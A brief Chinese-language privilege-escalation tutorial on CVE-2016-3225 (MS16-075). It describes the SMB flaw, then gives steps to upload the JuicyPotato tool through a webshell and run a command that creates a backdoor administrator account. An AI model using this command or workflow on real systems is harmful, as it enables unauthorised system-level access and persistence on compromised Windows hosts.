.CVE-2016-3225(MS16-075)提权
1.漏洞描述
当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块
(SMB) 中存在特权提升漏洞。成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。
若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的
应用程序,从而控制受影响的系统。此更新通过更正 Windows 服务器消息块 (SMB) 服务器处理凭据转
发请求的方式来修复此漏洞。
注:烂土豆(Rotten Potato)提权是一个本地提权,是针对本地用户的,不能用于域用户
下载文件 https://github.com/uknowsec/JuicyPotato 上传到webshell的可执行目录
可以看到当前已经是system权限,添加用户并添加到管理员组
C:\Windows\Temp\JuicyPotato_x64.exe -a “net user yidian 123 /add && net localgroup administrators yidian /add”
可以看到用户已经成功添加进来了